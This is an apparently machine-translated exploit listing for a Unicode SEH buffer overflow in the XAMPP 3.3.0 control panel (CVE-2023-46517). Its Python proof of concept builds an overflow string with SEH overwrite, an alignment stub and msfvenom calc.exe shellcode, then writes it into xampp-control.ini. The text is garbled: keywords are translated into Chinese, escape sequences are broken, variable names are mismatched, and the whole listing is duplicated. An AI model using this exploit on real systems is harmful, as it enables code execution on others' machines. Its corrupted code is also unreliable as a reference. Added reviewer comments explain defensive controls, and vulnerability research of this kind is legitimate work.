#exploit title: xampp v3.3.0 - '.ini'缓冲区溢出(unicode + seh)
#日期: 2023-10-26
#作者: Talson(@ripp3rdoc)
#软件link: https://sourceforge.net/projects/xa...x64-8.0.28-0.28-0-0-0-vs16-vs16-installer.exe
#版本: 3.3.0
#测试在: Windows 11
#CVE-2023-46517
##########
#__________________ ____________ _#
#\ __ __ /()(\(_ \(___))(( /|#)
#)(|()||(|(\/|()|| \(|#)
#| | | ()|| | | (__ | | | | | | | | |##
#| | | | _ || | (___)| | | | || (\ \)| #
#| | | ()|| | )|| | | | | | | | \ | #
#| | | )(||(__/\/\ _)||(___)||)\ | #
#)(|/\ |(______/\ _______)(________)|/)_)#
##
##########
#复现概念验证(PoC)的步骤:
#1.-运行Python脚本'poc.py',它将创建一个新文件'xampp-control.ini'
#2.-打开应用程序(XAMPP-control.exe)
#3.-单击Apache服务对应的“管理员”(Admin)按钮。
#4.-完成(原文为“Profit”,即概念验证生效)
#概念验证代码见GitHub: https://github.com/ripp3rdoc/xamppv3.3.3.0-bof/
#向EMU团队致意(€‿)⩙
从PWN导入*
导入封闭
导入OS.Path
# Builds the oversized string that the script later writes into xampp-control.ini.
# NOTE(review): this listing went through machine translation. Escape sequences
# contain stray spaces and the names on the final concatenation line do not match
# the names assigned above, so the code is kept byte-for-byte and is not runnable
# as shown.
buffer='\ x41' * 268# 268 bytes to fill the buffer
nseh='\ x59 \ x71'# next SEH address - 0x00590071 (harmless padding)
seh='\ x15 \ x43'# SEH handler - 0x00430015: pop ecx; pop ebp; ret;
padd='\ x71' *0x55# padding
eax_align='\ x47'# Venetian pad/align
eax_align +='\ x51'# push (operand lost in the translated comment)
eax_align +='\ x71'# Venetian pad/align
eax_align +='\ x58'# pop eax - eax=0019e1a0
eax_align +='\ x71'# Venetian pad/align
eax_align +='\ x05 \ x24 \ x11'# add eax, 0x11002300
eax_align +='\ x71'# Venetian pad/align
eax_align +='\ x2d \ x11 \ x11'# sub eax, 0x11001100 - eax=0019f3dc
eax_align +='\ x71'# Venetian pad/align
eax_align +='\ x50'# push eax
eax_align +='\ x71'# pad to align the following ret
eax_align +='\ xc3'; # ret (the rest of the original comment is garbled)
#msfvenom -p windows/exec cmd=calc.exe -e x86/unicode_mixed -f raw exitfunc=thread bufferRegister=eax -o shellcode.bin
# Payload size: 512 bytes
# Encoded payload as printed on the page; per the generator line above it only
# starts calc.exe as a demonstration.
# NOTE(review): letter case differs between rows of this literal, which may be an
# artifact of the page extraction - confirm against the original listing.
shellCode=((
'Ppyaiaiaiaiaiaiaiaiaiaiaiaiaiaiaiaiaiaiaiaiaiaiaiaiaiaiaiaiaiaiaiaiaiaiaiaiaiaiaqaaiaqaiaqaiahaaaz1aiaiaiaiaiaiaiaiaiaiaiaiaiaiaibababqi1'
'aiqiaiqi111aiajqyazbabababababkmagb9u4jbklzhrbm0ipm0c0bi7u01ep1tbkbbkb0npdkr2kr2zlrknrkdk42kx'
'jo6wpjnflqioflml1qallbllllo0gqxozmjagw7rzrobpwbknrzpdkmzmzmzmzmlknlzq1hzc1hzc0hkqqwab1dkqikp9qicrk'
'myKhGslzoYtKMdTKkQJ6ma9odlgQ8OJmM1vg08iPD5yfjcSMjXOKQmnDRUhdaH4KR8mTIq7c2FDKjlpKrkaHML'
'JAZ3DKITRKYQHPU9MTO4KTOK1KC1QI1JNQKO9P1OOOQJTKN2HKRMOMAZJATMBE7BYPM0KPPRM0KPR0PHMADKRODGIOJ57'
'kgpmmnjzjoxdfceemcmyo9emlivcl9ze0ikwpqe9ugkowkcprpo2jip2jip23kohuqsaqsaq0l33lns5pxrekpaa'
)
# Concatenates the filler, the two SEH record fields, the alignment stub, the
# padding and the payload into the single value used in the INI template.
shellCode=缓冲区+ NSEH + SEH + EAX_ALIGN + PADD + SHELLCODE
# Backup step: copies the existing xampp-control.ini to xampp-control.ini.bak
# before the configuration file is overwritten further down.
# NOTE(review): as shown, the path tested is the live xampp-control.ini rather
# than the .bak copy, although the message speaks of a backup. With this
# condition an existing configuration is overwritten without a backup being
# taken - confirm against the original listing before relying on it.
check_file=os.path.fisfile('c: \\ xampp \\ xampp-control.ini')
如果check_file:
打印('[!]备份文件找到。生成POC文件.')
经过
其他:
# Create the backup
TRY:
shutil.copyfile('c: \ xampp \ xampp-control.ini','c: \ xampp \ xampp-control.ini.bak')
打印('[+]为xampp-control.ini .'创建备份.')
打印('[+]备份文件创建!')
# Any failure while copying is reported and the script carries on.
除异常外,E:
打印('[!]失败为Xampp-control.ini:'创建备份,e)
# Writes a complete replacement xampp-control.ini. The third key of [common]
# (the line holding {shellCode}) receives the oversized value assembled earlier
# in the script; every other entry is a fixed template value.
# Defender note: the precondition is a local write to this file, and the steps
# in the header say the value is processed once the control panel is opened and
# the Apache admin button is clicked. Watching the file for unexpected writes or
# abnormally long values, and limiting who may write to the XAMPP directory, are
# the relevant controls.
# NOTE(review): the page names no fixed version - check the vendor's release notes.
TRY:
# Create the new file
开放('c: \\ xampp \\ xampp-control.ini','w',encoding='utf-8')as file:
file.write(f'''[common]
版本=
编辑器=
浏览器={shellCode}
调试=0
debuglevel=0
语言=en
tomcatvisible=1
最小化=0
[logSettings]
字体=arial
fontsize=10
[Windowsettings]
左=-1
顶部=-1
宽度=682
高度=441
[autostart]
apache=0
mysql=0
filezilla=0
汞=0
tomcat=0
[检查]
CheckRuntimes=1
CheckDefaultPorts=1
[Modulenames]
apache=apache
mysql=mysql
汞=汞
tomcat=tomcat
[enablemodules]
apache=1
mysql=1
filezilla=1
汞=1
tomcat=1
[启用服务]
apache=1
mysql=1
filezilla=1
tomcat=1
[二进制名称]
apache=httpd.exe
mysql=mysqld.exe
filezilla=filezillaserver.exe
filezillaadmin=filezilla Server interface.exe
汞=汞
tomcat=tomcat8.exe
[ServiceNames]
apache=apache2.4
mysql=mysql
filezilla=filezillaserver
tomcat=tomcat
[ServicePorts]
Apache=80
Apachessl=443
mysql=3306
filezilla=21
filezill=14147
汞1=25
Mercury2=79
Mercury3=105
Mercury4=106
Mercury5=110
汞6=143
Mercury7=2224
tomcathtp=8080
tomcatajp=8009
tomcat=8005
[userconfigs]
apache=
mysql=
filezilla=
汞=
tomcat=
[UserLogs]
apache=
mysql=
filezilla=
汞=
tomcat=
''))
打印('[+]创建POC!')
# Any failure while writing the file is reported rather than raised.
除异常外,E:
print('[!]失败创建POC XAMPP-CONTROL.INI:',e)
#日期: 2023-10-26
#作者: Talson(@ripp3rdoc)
#软件link: https://sourceforge.net/projects/xa...x64-8.0.28-0.28-0-0-0-vs16-vs16-installer.exe
#版本: 3.3.0
#测试在: Windows 11
#CVE-2023-46517
##########
#__________________ ____________ _#
#\ __ __ /()(\(_ \(___))(( /|#)
#)(|()||(|(\/|()|| \(|#)
#| | | ()|| | | (__ | | | | | | | | |##
#| | | | _ || | (___)| | | | || (\ \)| #
#| | | ()|| | )|| | | | | | | | \ | #
#| | | )(||(__/\/\ _)||(___)||)\ | #
#)(|/\ |(______/\ _______)(________)|/)_)#
##
##########
#复现概念验证(PoC)的步骤:
#1.-运行Python脚本'poc.py',它将创建一个新文件'xampp-control.ini'
#2.-打开应用程序(XAMPP-control.exe)
#3.-单击Apache服务对应的“管理员”(Admin)按钮。
#4.-完成(原文为“Profit”,即概念验证生效)
#概念验证代码见GitHub: https://github.com/ripp3rdoc/xamppv3.3.3.0-bof/
#向EMU团队致意(€‿)⩙
从PWN导入*
导入封闭
导入OS.Path
# Builds the oversized string that the script later writes into xampp-control.ini.
# NOTE(review): this listing went through machine translation. Escape sequences
# contain stray spaces and the names on the final concatenation line do not match
# the names assigned above, so the code is kept byte-for-byte and is not runnable
# as shown.
buffer='\ x41' * 268# 268 bytes to fill the buffer
nseh='\ x59 \ x71'# next SEH address - 0x00590071 (harmless padding)
seh='\ x15 \ x43'# SEH handler - 0x00430015: pop ecx; pop ebp; ret;
padd='\ x71' *0x55# padding
eax_align='\ x47'# Venetian pad/align
eax_align +='\ x51'# push (operand lost in the translated comment)
eax_align +='\ x71'# Venetian pad/align
eax_align +='\ x58'# pop eax - eax=0019e1a0
eax_align +='\ x71'# Venetian pad/align
eax_align +='\ x05 \ x24 \ x11'# add eax, 0x11002300
eax_align +='\ x71'# Venetian pad/align
eax_align +='\ x2d \ x11 \ x11'# sub eax, 0x11001100 - eax=0019f3dc
eax_align +='\ x71'# Venetian pad/align
eax_align +='\ x50'# push eax
eax_align +='\ x71'# pad to align the following ret
eax_align +='\ xc3'; # ret (the rest of the original comment is garbled)
#msfvenom -p windows/exec cmd=calc.exe -e x86/unicode_mixed -f raw exitfunc=thread bufferRegister=eax -o shellcode.bin
# Payload size: 512 bytes
# Encoded payload as printed on the page; per the generator line above it only
# starts calc.exe as a demonstration.
# NOTE(review): letter case differs between rows of this literal, which may be an
# artifact of the page extraction - confirm against the original listing.
shellCode=((
'Ppyaiaiaiaiaiaiaiaiaiaiaiaiaiaiaiaiaiaiaiaiaiaiaiaiaiaiaiaiaiaiaiaiaiaiaiaiaiaiaqaaiaqaiaqaiahaaaz1aiaiaiaiaiaiaiaiaiaiaiaiaiaiaibababqi1'
'aiqiaiqi111aiajqyazbabababababkmagb9u4jbklzhrbm0ipm0c0bi7u01ep1tbkbbkb0npdkr2kr2zlrknrkdk42kx'
'jo6wpjnflqioflml1qallbllllo0gqxozmjagw7rzrobpwbknrzpdkmzmzmzmzmlknlzq1hzc1hzc0hkqqwab1dkqikp9qicrk'
'myKhGslzoYtKMdTKkQJ6ma9odlgQ8OJmM1vg08iPD5yfjcSMjXOKQmnDRUhdaH4KR8mTIq7c2FDKjlpKrkaHML'
'JAZ3DKITRKYQHPU9MTO4KTOK1KC1QI1JNQKO9P1OOOQJTKN2HKRMOMAZJATMBE7BYPM0KPPRM0KPR0PHMADKRODGIOJ57'
'kgpmmnjzjoxdfceemcmyo9emlivcl9ze0ikwpqe9ugkowkcprpo2jip2jip23kohuqsaqsaq0l33lns5pxrekpaa'
)
# Concatenates the filler, the two SEH record fields, the alignment stub, the
# padding and the payload into the single value used in the INI template.
shellCode=缓冲区+ NSEH + SEH + EAX_ALIGN + PADD + SHELLCODE
# Backup step: copies the existing xampp-control.ini to xampp-control.ini.bak
# before the configuration file is overwritten further down.
# NOTE(review): as shown, the path tested is the live xampp-control.ini rather
# than the .bak copy, although the message speaks of a backup. With this
# condition an existing configuration is overwritten without a backup being
# taken - confirm against the original listing before relying on it.
check_file=os.path.fisfile('c: \\ xampp \\ xampp-control.ini')
如果check_file:
打印('[!]备份文件找到。生成POC文件.')
经过
其他:
# Create the backup
TRY:
shutil.copyfile('c: \ xampp \ xampp-control.ini','c: \ xampp \ xampp-control.ini.bak')
打印('[+]为xampp-control.ini .'创建备份.')
打印('[+]备份文件创建!')
# Any failure while copying is reported and the script carries on.
除异常外,E:
打印('[!]失败为Xampp-control.ini:'创建备份,e)
# Writes a complete replacement xampp-control.ini. The third key of [common]
# (the line holding {shellCode}) receives the oversized value assembled earlier
# in the script; every other entry is a fixed template value.
# Defender note: the precondition is a local write to this file, and the steps
# in the header say the value is processed once the control panel is opened and
# the Apache admin button is clicked. Watching the file for unexpected writes or
# abnormally long values, and limiting who may write to the XAMPP directory, are
# the relevant controls.
# NOTE(review): the page names no fixed version - check the vendor's release notes.
TRY:
# Create the new file
开放('c: \\ xampp \\ xampp-control.ini','w',encoding='utf-8')as file:
file.write(f'''[common]
版本=
编辑器=
浏览器={shellCode}
调试=0
debuglevel=0
语言=en
tomcatvisible=1
最小化=0
[logSettings]
字体=arial
fontsize=10
[Windowsettings]
左=-1
顶部=-1
宽度=682
高度=441
[autostart]
apache=0
mysql=0
filezilla=0
汞=0
tomcat=0
[检查]
CheckRuntimes=1
CheckDefaultPorts=1
[Modulenames]
apache=apache
mysql=mysql
汞=汞
tomcat=tomcat
[enablemodules]
apache=1
mysql=1
filezilla=1
汞=1
tomcat=1
[启用服务]
apache=1
mysql=1
filezilla=1
tomcat=1
[二进制名称]
apache=httpd.exe
mysql=mysqld.exe
filezilla=filezillaserver.exe
filezillaadmin=filezilla Server interface.exe
汞=汞
tomcat=tomcat8.exe
[ServiceNames]
apache=apache2.4
mysql=mysql
filezilla=filezillaserver
tomcat=tomcat
[ServicePorts]
Apache=80
Apachessl=443
mysql=3306
filezilla=21
filezill=14147
汞1=25
Mercury2=79
Mercury3=105
Mercury4=106
Mercury5=110
汞6=143
Mercury7=2224
tomcathtp=8080
tomcatajp=8009
tomcat=8005
[userconfigs]
apache=
mysql=
filezilla=
汞=
tomcat=
[UserLogs]
apache=
mysql=
filezilla=
汞=
tomcat=
''))
打印('[+]创建POC!')
# Any failure while writing the file is reported rather than raised.
除异常外,E:
print('[!]失败创建POC XAMPP-CONTROL.INI:',e)